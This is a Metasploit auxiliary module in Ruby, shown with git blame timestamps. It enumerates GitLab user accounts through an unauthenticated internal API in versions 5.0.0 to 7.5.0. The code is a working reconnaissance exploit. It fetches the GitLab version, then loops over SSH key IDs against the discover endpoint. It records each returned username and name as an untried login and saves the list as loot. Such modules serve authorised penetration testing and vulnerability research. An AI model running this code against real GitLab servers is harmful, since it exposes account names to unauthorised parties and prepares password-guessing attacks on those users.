metasploit-framework/modules/auxiliary/scanner/http/gitlab_user_enum.rb

155 lines
4.6 KiB
Ruby
Raw Normal View History

2014-08-17 04:39:12 +00:00
##
2015-03-20 17:27:23 +00:00
# This module requires Metasploit: http://metasploit.com/download
2014-08-17 04:39:12 +00:00
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'rex/proto/http'
require 'msf/core'
require 'json'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
def initialize(info = {})
2014-12-15 17:20:23 +00:00
super(update_info(
info,
2015-03-20 22:26:21 +00:00
'Name' => 'GitLab User Enumeration',
'Description' => "
2015-03-17 11:33:57 +00:00
The GitLab 'internal' API is exposed unauthenticated on GitLab. This
2014-08-17 04:39:12 +00:00
allows the username for each SSH Key ID number to be retrieved. Users
2014-12-15 17:20:23 +00:00
who do not have an SSH Key cannot be enumerated in this fashion. LDAP
2015-03-17 10:03:32 +00:00
users, e.g. Active Directory users will also be returned. This issue
2015-03-17 11:33:57 +00:00
was fixed in GitLab v7.5.0 and is present from GitLab v5.0.0.
2014-12-15 17:20:23 +00:00
",
2015-03-20 22:26:21 +00:00
'Author' => 'Ben Campbell',
'License' => MSF_LICENSE,
2015-03-20 19:17:34 +00:00
'DisclosureDate' => 'Nov 21 2014',
2015-03-20 22:26:21 +00:00
'References' =>
2015-03-20 19:17:34 +00:00
[
2015-03-20 22:26:21 +00:00
['URL', 'https://labs.mwrinfosecurity.com/blog/2015/03/20/gitlab-user-enumeration/']
2015-03-20 19:17:34 +00:00
]
2014-12-15 17:20:23 +00:00
))
2014-08-17 04:39:12 +00:00
register_options(
[
2015-03-17 11:33:57 +00:00
OptString.new('TARGETURI', [ true, 'Path to GitLab instance', '/']),
2014-08-17 04:39:12 +00:00
OptInt.new('START_ID', [true, 'ID number to start from', 0]),
OptInt.new('END_ID', [true, 'ID number to enumerate up to', 50])
], self.class)
end
def run_host(_ip)
2015-03-17 10:03:32 +00:00
internal_api = '/api/v3/internal'
2014-08-17 04:39:12 +00:00
check = normalize_uri(target_uri.path, internal_api, 'check')
2015-03-17 11:33:57 +00:00
print_status('Sending GitLab version request...')
2014-08-17 04:39:12 +00:00
res = send_request_cgi(
'uri' => check
)
if res && res.code == 200 && res.body
begin
version = JSON.parse(res.body)
rescue JSON::ParserError
fail_with(Failure::Unknown, 'Failed to parse banner version from JSON')
end
2014-08-17 04:39:12 +00:00
git_version = version['gitlab_version']
git_revision = version['gitlab_rev']
print_good("GitLab version: #{git_version} revision: #{git_revision}")
2015-03-17 10:03:32 +00:00
service = report_service(
2014-08-17 04:39:12 +00:00
host: rhost,
port: rport,
name: (ssl ? 'https' : 'http'),
proto: 'tcp'
)
report_web_site(
host: rhost,
port: rport,
ssl: ssl,
2015-03-17 11:33:57 +00:00
info: "GitLab Version - #{git_version}"
2014-08-17 04:39:12 +00:00
)
2014-12-15 17:44:24 +00:00
elsif res && res.code == 401
2015-03-17 11:33:57 +00:00
fail_with(Failure::NotVulnerable, 'Unable to retrieve GitLab version...')
2014-12-15 18:13:22 +00:00
else
2015-03-17 11:33:57 +00:00
fail_with(Failure::Unknown, 'Unable to retrieve GitLab version...')
2014-12-15 17:20:23 +00:00
end
2014-08-17 04:39:12 +00:00
discover = normalize_uri(target_uri.path, internal_api, 'discover')
2015-03-17 09:55:28 +00:00
users = ''
2014-08-17 04:39:12 +00:00
print_status("Enumerating user keys #{datastore['START_ID']}-#{datastore['END_ID']}...")
datastore['START_ID'].upto(datastore['END_ID']) do |id|
res = send_request_cgi(
'uri' => discover,
'method' => 'GET',
'vars_get' => { 'key_id' => id }
)
2014-12-15 18:13:22 +00:00
if res && res.code == 200 && res.body
2014-08-17 04:39:12 +00:00
begin
user = JSON.parse(res.body)
2015-03-17 09:55:28 +00:00
username = user['username']
unless username.nil? || username.to_s.empty?
print_good("Key-ID: #{id} Username: #{username} Name: #{user['name']}")
store_username(username, res)
users << "#{username}\n"
end
2014-08-17 04:39:12 +00:00
rescue JSON::ParserError
print_error("Key-ID: #{id} - Unexpected response body: #{res.body}")
end
elsif res
vprint_status("Key-ID: #{id} not found")
else
print_error('Connection timed out...')
end
end
2015-03-17 09:55:28 +00:00
unless users.nil? || users.to_s.empty?
2015-03-17 10:03:32 +00:00
store_userlist(users, service)
2015-03-17 09:55:28 +00:00
end
end
2015-03-17 10:03:32 +00:00
def store_userlist(users, service)
2015-03-17 11:33:57 +00:00
loot = store_loot('gitlab.users', 'text/plain', rhost, users, nil, 'GitLab Users', service)
2015-03-17 09:55:28 +00:00
print_good("Userlist stored at #{loot}")
2014-08-17 04:39:12 +00:00
end
2014-12-15 17:20:23 +00:00
2014-12-15 18:13:22 +00:00
def store_username(username, res)
service = ssl ? 'https' : 'http'
service_data = {
address: rhost,
port: rport,
service_name: service,
protocol: 'tcp',
workspace_id: myworkspace_id,
proof: res
}
credential_data = {
origin_type: :service,
module_fullname: fullname,
username: username
}
credential_data.merge!(service_data)
# Create the Metasploit::Credential::Core object
credential_core = create_credential(credential_data)
# Assemble the options hash for creating the Metasploit::Credential::Login object
login_data = {
core: credential_core,
status: Metasploit::Model::Login::Status::UNTRIED
}
# Merge in the service data and create our Login
login_data.merge!(service_data)
create_credential_login(login_data)
end
end